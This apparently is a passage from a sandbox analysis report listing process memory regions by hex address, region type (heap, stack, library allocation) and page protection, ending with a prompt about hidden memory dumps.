7FF848DE0000
|
trusted library allocation
|
page read and write
|
||
|
1DE5F827000
|
heap
|
page read and write
|
||
|
50CADFE000
|
stack
|
page read and write
|
||
|
26B5FFFC000
|
heap
|
page read and write
|
||
|
1DE61143000
|
trusted library allocation
|
page read and write
|
||
|
107F6730000
|
heap
|
page read and write
|
||
|
4037FB000
|
stack
|
page read and write
|
||
|
10790001000
|
trusted library allocation
|
page read and write
|
||
|
27DA8B00000
|
heap
|
page read and write
|
||
|
7FF848FF0000
|
trusted library allocation
|
page read and write
|
||
|
26B7A23E000
|
heap
|
page read and write
|
||
|
26B61B80000
|
trusted library allocation
|
page read and write
|
||
|
4041CF000
|
stack
|
page read and write
|
||
|
26B62489000
|
trusted library allocation
|
page read and write
|
||
|
26B72040000
|
trusted library allocation
|
page read and write
|
||
|
107F8786000
|
heap
|
page read and write
|
||
|
7FF848F80000
|
trusted library allocation
|
page read and write
|
||
|
7FF849000000
|
trusted library allocation
|
page read and write
|
||
|
107F6755000
|
heap
|
page read and write
|
||
|
10780001000
|
trusted library allocation
|
page read and write
|
||
|
1DE61140000
|
trusted library allocation
|
page read and write
|
||
|
26B7A3C7000
|
heap
|
page execute and read and write
|
||
|
26B6254F000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FD0000
|
trusted library allocation
|
page read and write
|
||
|
1DE62F47000
|
trusted library allocation
|
page read and write
|
||
|
26B720AF000
|
trusted library allocation
|
page read and write
|
||
|
26B5FFBE000
|
heap
|
page read and write
|
||
|
E1375FF000
|
stack
|
page read and write
|
||
|
27DA8313000
|
heap
|
page read and write
|
||
|
107F647F000
|
heap
|
page read and write
|
||
|
50CA77A000
|
stack
|
page read and write
|
||
|
27DA82A0000
|
heap
|
page read and write
|
||
|
D35027F000
|
stack
|
page read and write
|
||
|
26B7A142000
|
heap
|
page read and write
|
||
|
7FF848E50000
|
trusted library allocation
|
page execute and read and write
|
||
|
A54F2FD000
|
stack
|
page read and write
|
||
|
2756EF40000
|
heap
|
page read and write
|
||
|
7FF849050000
|
trusted library allocation
|
page read and write
|
||
|
D3500FE000
|
stack
|
page read and write
|
||
|
7FF848F60000
|
trusted library allocation
|
page read and write
|
||
|
40377F000
|
stack
|
page read and write
|
||
|
26B72031000
|
trusted library allocation
|
page read and write
|
||
|
2756F330000
|
heap
|
page read and write
|
||
|
7FF849080000
|
trusted library allocation
|
page read and write
|
||
|
D35114E000
|
stack
|
page read and write
|
||
|
27DA8317000
|
heap
|
page read and write
|
||
|
27DAD850000
|
heap
|
page read and write
|
||
|
107F6750000
|
heap
|
page read and write
|
||
|
1DE6142E000
|
trusted library allocation
|
page read and write
|
||
|
E1372FE000
|
stack
|
page read and write
|
||
|
27DA8A02000
|
heap
|
page read and write
|
||
|
7FF849010000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FD0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F70000
|
trusted library allocation
|
page read and write
|
||
|
27DAD855000
|
heap
|
page read and write
|
||
|
26B7A1B7000
|
heap
|
page read and write
|
||
|
27DADA50000
|
trusted library allocation
|
page read and write
|
||
|
1DE5F670000
|
heap
|
page read and write
|
||
|
E2FD1FE000
|
stack
|
page read and write
|
||
|
1DE62A7A000
|
trusted library allocation
|
page read and write
|
||
|
1DE79AAE000
|
heap
|
page read and write
|
||
|
107804B9000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D80000
|
trusted library allocation
|
page read and write
|
||
|
26B601B0000
|
heap
|
page read and write
|
||
|
7FF848D3D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1DE79727000
|
heap
|
page read and write
|
||
|
27DAD8E3000
|
heap
|
page read and write
|
||
|
26B61B50000
|
trusted library allocation
|
page read and write
|
||
|
E2FD2FE000
|
unkown
|
page readonly
|
||
|
A54EE82000
|
stack
|
page read and write
|
||
|
26B7A1F8000
|
heap
|
page read and write
|
||
|
7FF848F10000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848F60000
|
trusted library allocation
|
page execute and read and write
|
||
|
1DE79860000
|
heap
|
page read and write
|
||
|
245D75F0000
|
heap
|
page read and write
|
||
|
18899920000
|
heap
|
page read and write
|
||
|
C452D9F000
|
stack
|
page read and write
|
||
|
107F851D000
|
heap
|
page read and write
|
||
|
107F8450000
|
heap
|
page read and write
|
||
|
1DE79830000
|
heap
|
page execute and read and write
|
||
|
50CB3FB000
|
stack
|
page read and write
|
||
|
27DA82FF000
|
heap
|
page read and write
|
||
|
4033FE000
|
stack
|
page read and write
|
||
|
26B6227B000
|
trusted library allocation
|
page read and write
|
||
|
245D7590000
|
heap
|
page read and write
|
||
|
50CAAFE000
|
stack
|
page read and write
|
||
|
27DAE000000
|
heap
|
page read and write
|
||
|
7FF849060000
|
trusted library allocation
|
page read and write
|
||
|
D34FD0E000
|
stack
|
page read and write
|
||
|
27DA9220000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1DE615DD000
|
trusted library allocation
|
page read and write
|
||
|
7FF84900A000
|
trusted library allocation
|
page read and write
|
||
|
E1370FF000
|
stack
|
page read and write
|
||
|
27DA9040000
|
trusted library allocation
|
page read and write
|
||
|
1DE5F83F000
|
heap
|
page read and write
|
||
|
26B639FB000
|
trusted library allocation
|
page read and write
|
||
|
26B7A140000
|
heap
|
page read and write
|
||
|
27DAD730000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F30000
|
trusted library allocation
|
page execute and read and write
|
||
|
E136CFE000
|
stack
|
page read and write
|
||
|
1078005E000
|
trusted library allocation
|
page read and write
|
||
|
27DA82AA000
|
heap
|
page read and write
|
||
|
27DA8243000
|
heap
|
page read and write
|
||
|
107F853A000
|
heap
|
page read and write
|
||
|
1DE79810000
|
heap
|
page execute and read and write
|
||
|
27DAD6D0000
|
trusted library allocation
|
page read and write
|
||
|
1DE797B7000
|
heap
|
page read and write
|
||
|
26B7231C000
|
trusted library allocation
|
page read and write
|
||
|
27DAD8A0000
|
trusted library allocation
|
page read and write
|
||
|
27DA82B3000
|
heap
|
page read and write
|
||
|
27DA8329000
|
heap
|
page read and write
|
||
|
107F8630000
|
heap
|
page read and write
|
||
|
26B63C7E000
|
trusted library allocation
|
page read and write
|
||
|
E2FDAFE000
|
unkown
|
page readonly
|
||
|
7FF848F40000
|
trusted library allocation
|
page execute and read and write
|
||
|
403479000
|
stack
|
page read and write
|
||
|
7FF849030000
|
trusted library allocation
|
page read and write
|
||
|
107F64EF000
|
heap
|
page read and write
|
||
|
26B62031000
|
trusted library allocation
|
page read and write
|
||
|
A54F47E000
|
stack
|
page read and write
|
||
|
27DA81A0000
|
heap
|
page read and write
|
||
|
1DE62A40000
|
trusted library allocation
|
page read and write
|
||
|
A54F5FE000
|
stack
|
page read and write
|
||
|
7FF848D50000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D6B000
|
trusted library allocation
|
page read and write
|
||
|
10790011000
|
trusted library allocation
|
page read and write
|
||
|
27DAD8E8000
|
heap
|
page read and write
|
||
|
245D75B0000
|
heap
|
page read and write
|
||
|
7FF848DE6000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FB0000
|
trusted library allocation
|
page read and write
|
There are 541 hidden memdumps, click here to show them.